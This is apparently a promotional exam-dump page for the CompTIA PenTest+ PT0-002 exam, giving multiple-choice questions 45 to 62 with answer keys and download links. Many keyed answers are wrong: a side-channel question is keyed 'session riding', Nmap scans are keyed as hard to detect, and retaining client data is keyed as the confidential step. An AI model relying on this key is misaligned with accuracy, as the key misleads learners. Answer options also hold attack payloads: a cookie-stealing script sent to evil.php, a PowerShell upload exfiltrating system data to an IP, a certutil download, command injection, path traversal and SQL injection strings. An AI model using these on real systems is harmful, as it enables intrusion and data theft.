
[Jan-2022] CompTIA PT0-002 Official Cert Guide PDF
Exam PT0-002: CompTIA PenTest+ Certification - TestkingPDF
NEW QUESTION 45
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?
- A. Data flooding
- B. Session riding
- C. Side channel
- D. Cybersquatting
Answer: B
NEW QUESTION 46
A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?
- A. "cisco-ios" "admin+1234"
- B. "cisco-ios" "default-passwords"
- C. "cisco-ios" "last-modified"
- D. "cisco-ios" "no-password"
Answer: A
NEW QUESTION 47
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
- A. NDA
- B. ROE
- C. SLA
- D. MSA
Answer: A
NEW QUESTION 48
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?
- A. PTES technical guidelines
- B. OWASP Web Security Testing Guide
- C. NIST SP 800-115
- D. OSSTMM
Answer: A
NEW QUESTION 49
A penetration tester is reviewing the following SOW prior to engaging with a client:
"Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
- A. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
- B. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
- C. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
- D. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
- E. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
- F. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
Answer: D,E
NEW QUESTION 50
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
- A. An Nmap scan
- B. A ping sweep
- C. Port knocking
- D. Open-source research
- E. Traffic sniffing
- F. A vulnerability scan
Answer: A,F
NEW QUESTION 51
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
- A. As backup in case the original documents are lost
- B. To validate the billing information with the client
- C. As proof in case they are discovered
- D. To guide them through the building entrances
Answer: C
NEW QUESTION 52
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?
- A. The planning process failed to ensure all teams were notified
- B. The penetration tester had incorrect contact information
- C. The penetration tester was testing the wrong assets
- D. The client was not ready for the assessment to start
Answer: A
NEW QUESTION 53
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
Have a full TCP connection
Send a "hello" payload
Walt for a response
Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?
- A. Perform a credentialed scan with Nessus.
- B. Run nmap -Pn -sV -script vuln <IP address>.
- C. Employ an OpenVAS simple scan against the TCP port of the host.
- D. Create a script in the Lua language and use it with NSE.
Answer: A
NEW QUESTION 54
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?
- A. The reverse-engineering team will be given access to source code for analysis.
- B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
- C. The reverse-engineering team may have a history of selling exploits to third parties.
- D. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
Answer: A
NEW QUESTION 55
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
- A. Determine if the failover environment relies on resources not owned by the client.
- B. Verify the client has granted network access to the hot site.
- C. Ensure the client has signed the SOW.
- D. Establish communication and escalation procedures with the client.
Answer: A
NEW QUESTION 56
A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?
- A. 1 UNION SELECT 1, DATABASE(),3--
- B. <script>var adr= '../evil.php?test=' + escape(document.cookie);</script>
- C. /var/www/html/index.php;whoami
- D. ../../../../../../../../../../etc/passwd
Answer: C
NEW QUESTION 57
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
- B. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
- C. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
- D. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
Answer: D
NEW QUESTION 58
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
- A. RFID cloning
- B. Tag nesting
- C. Meta tagging
- D. RFID tagging
Answer: C
NEW QUESTION 59
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
- A. A firewall or IPS blocked the scan.
- B. The edge network device was disconnected.
- C. The scan returned ICMP echo replies.
- D. The penetration tester used unsupported flags.
Answer: A
NEW QUESTION 60
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?
- A. Encrypt and store any client information for future analysis
- B. Report any findings to regulatory oversight groups
- C. Publish the findings after the client reviews the report
- D. Follow the established data retention and destruction process
Answer: A
NEW QUESTION 61
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
- A. SOW
- B. NDA
- C. MOU
- D. MSA
Answer: A
NEW QUESTION 62
A penetration tester conducted an assessment on a web server. The logs from this session show the following:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted?
- A. Clickjacking
- B. Session hijacking
- C. Cross-site scripting
- D. Cookie hijacking
- E. Parameter pollution
Answer: E
NEW QUESTION 63
......
Free PT0-002 Exam Dumps to Improve Exam Score: https://www.testkingpdf.com/PT0-002-testking-pdf-torrent.html
2022 Realistic PT0-002 Dumps Exam Tips Test Pdf Exam Materials: https://drive.google.com/open?id=1d6WE7itKQZ5IFzau2M2I7H8iOjHqRG-y

